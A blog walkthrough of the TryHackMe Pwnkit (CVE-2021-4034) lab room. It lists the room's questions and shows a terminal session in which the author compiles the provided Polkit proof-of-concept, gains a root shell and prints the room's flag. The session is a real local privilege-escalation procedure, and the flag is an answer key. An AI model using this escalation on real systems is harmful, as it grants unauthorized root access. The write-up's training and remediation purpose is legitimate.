Tryhackme - Pwnkit: (CVE-2021-4034)

Tryhackme – Pwnkit: (CVE-2021-4034)

In this walk through, we will be going through the Pwnkit: (CVE-2021-4034) room from Tryhackme. We will take a dive into an interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. So, let’s get started without any delay.

Pwnkit

Task 1 – [Info] Introduction and Deploy

Task 1 - [Info] Introduction and Deploy

Task 2 – [Tutorial] Background

Question 1 – Is Pwnkit exploitable remotely (Aye/Nay)?

Question 2 – In which Polkit utility does the Pwnkit vulnerability reside?

Task 2 - [Tutorial] Background

Task 3 – [Practical] Exploitation

Question 1 – Read through the cve-2021-4034-poc.c file and try to understand how it works. See if you can match this up with the Qualys security advisory and the explanation given in the previous task!

Question 2 – Exploit the vulnerability! What is the flag located at /root/flag.txt?

wh1terose@fsociety:~/CTF/TryHackme/Pwnkit/CVE-2021-4034$ ssh tryhackme@10.10.189.29
The authenticity of host '10.10.189.29 (10.10.189.29)' can't be established.
ECDSA key fingerprint is SHA256:IYBKs2H1eA35XEWnIyT3iwiKTGpNRauPL0MbeTiUCVg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.189.29' (ECDSA) to the list of known hosts.
tryhackme@10.10.189.29's password: 

		 ____                 _    _ _   
		|  _ \__      ___ __ | | _(_) |_ 
		| |_) \ \ /\ / / '_ \| |/ / | __|
		|  __/ \ V  V /| | | |   <| | |_ 
		|_|     \_/\_/ |_| |_|_|\_\_|\__|
						 

tryhackme@pwnkit:~$ ls
pwnkit
tryhackme@pwnkit:~$ cd pwnkit/
tryhackme@pwnkit:~/pwnkit$ ls
README.md  cve-2021-4034-poc.c
tryhackme@pwnkit:~/pwnkit$ gcc cve-2021-4034-poc.c -o exploit
tryhackme@pwnkit:~/pwnkit$ ./exploit 
# id  
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
# cat /root/flag.txt
THM{CONGRATULATIONS-YOU-EXPLOITED-PWNKIT}

Pwnkit exploit

Question 3 – [Bonus Question — Optional] Using the Qualys advisory and the repository linked in the task, try to write your own version of the Pwnkit exploit.

Task 3 - [Practical] Exploitation

Task 4 – [Tutorial] Remediations

Question 1 – Read the remediations task

Question 2 – Patch the vulnerability on any Linux devices that you manage!

Task 4 - [Tutorial] Remediations

Task 5 – [Info] Conclusion

Task 5 - [Info] Conclusion

Also Read: Tryhackme – Smag Grotto

So that was Pwnkit: (CVE-2021-4034) for you. We looked into the background of the Polkit vulnerability and further moved into its exploitation and remediation. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top